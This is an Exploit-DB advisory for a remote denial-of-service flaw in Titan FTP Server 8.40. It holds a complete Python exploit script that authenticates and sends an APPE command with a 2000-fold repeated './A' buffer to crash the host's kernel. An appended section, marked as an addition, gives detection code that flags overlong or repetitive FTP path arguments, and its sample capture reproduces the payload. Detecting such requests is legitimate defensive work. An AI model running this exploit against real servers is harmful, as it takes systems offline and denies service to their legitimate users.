Titan FTP Server 8.40 – ‘APPE’ Remote Denial of Service

  • Author: Houssam Sahli
    Date: 2011-11-25
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/36361/
  • source: https://www.securityfocus.com/bid/50819/info
    
    Titan FTP Server is prone to a remote denial-of-service vulnerability.
    
    Exploiting this issue allows remote attackers to crash the affected FTP server, denying service to legitimate users.
    
    Titan FTP Server 8.40 is vulnerable; other versions may also be affected. 
    
    #!/usr/bin/python
    #
    # Exploit Title : Titan FTP Server 8.40 DoS Kernel Crash
    # Date: 25/11/2011
    # Author: Houssam Sahli
    # Software Link (trial version) : http://southrivertech.com/software/demosoft/titanftp.exe
    # Version: 8.40
    # Developed by : South River Technologies, Inc.
    # Tested on: Windows XP SP3 French
    # Description : This exploit crashes the kernel of a Windows running TITAN FTP Server 8.40 and succeed the magical "blue screen of death".
    # Thanks to : Mehdi Boukazoula and Rwissi Networking for their support ;)...because we can improve computer security in Algeria, we'll do it.
    
    
    print "\nYou need a valid account to succeed this DoS, but even anonymous can do it as long as it has permission to call APPE command.\n"
    
    import socket
    import sys

    def Usage():
        print ("Usage: ./expl.py <host> <Username> <password>\n")

    buffer= "./A" * 2000

    def start(hostname, username, passwd):
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            sock.connect((hostname, 21))
        except:
            print ("[-] Connection error!")
            sys.exit(1)
        r=sock.recv(1024)
        print "[+] " + r
        sock.send("user %s\r\n" %username)
        r=sock.recv(1024)
        sock.send("pass %s\r\n" %passwd)
        r=sock.recv(1024)
        print "[+] wait for the crash...;)"
        sock.send("APPE %s\r\n" %buffer)
        sock.close()

    if len(sys.argv) <> 4:
        Usage()
        sys.exit(1)
    else:
        hostname=sys.argv[1]
        username=sys.argv[2]
        passwd=sys.argv[3]
        start(hostname,username,passwd)
        sys.exit(0)
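
A detection-side counterpart to the script above, added here as an example and not part of the original advisory or exploit: it scans FTP control-channel commands for path arguments that are overlong or built from one short unit repeated many times, which is the shape of the APPE request the script sends. The thresholds, function names and sample capture are assumptions constructed for illustration.

```python
import re

MAX_ARG_LEN = 1024   # assumed limit; tune to the longest path your users really send
MAX_REPEATS = 32     # assumed limit on back-to-back repeats of one short unit

# RFC 959 commands that carry a pathname; APPE is the one named in this advisory.
PATH_COMMANDS = {"APPE", "STOR", "RETR", "DELE", "CWD", "MKD", "RMD",
                 "RNFR", "RNTO", "LIST", "NLST"}

# A unit of 1-8 characters followed by at least MAX_REPEATS - 1 more copies of itself.
_REPEAT = re.compile(r"(.{1,8}?)\1{%d,}" % (MAX_REPEATS - 1), re.DOTALL)


def parse_command(line):
    """Split one control-channel line into (VERB, argument)."""
    verb, _, arg = line.rstrip("\r\n").partition(" ")
    return verb.upper(), arg


def inspect(line):
    """Return the reasons a command looks anomalous; an empty list means clean."""
    verb, arg = parse_command(line)
    if verb not in PATH_COMMANDS:
        return []
    reasons = []
    if len(arg) > MAX_ARG_LEN:
        reasons.append("path argument is %d characters (limit %d)" % (len(arg), MAX_ARG_LEN))
    if _REPEAT.search(arg):
        reasons.append("path argument repeats one short unit %d or more times" % MAX_REPEATS)
    return reasons


def scan(lines):
    """Return (line_number, verb, reasons) for every flagged command."""
    return [(n, parse_command(l)[0], r)
            for n, l in enumerate(lines, 1)
            for r in [inspect(l)] if r]


# Constructed control-channel capture; the last line mirrors the shape of the
# request in the script above (a short unit repeated 2000 times).
SAMPLE = [
    "USER alice\r\n",
    "PASS ********\r\n",
    "CWD /uploads/2011/reports\r\n",
    "appe daily.log\r\n",
    "APPE " + "./A" * 2000 + "\r\n",
]

if __name__ == "__main__":
    for n, verb, reasons in scan(SAMPLE):
        print("line %d %s: %s" % (n, verb, "; ".join(reasons)))
```

The same two checks can run in an FTP-aware proxy or IDS rule in front of the server, so that the request is rejected before it reaches an unpatched Titan FTP instance.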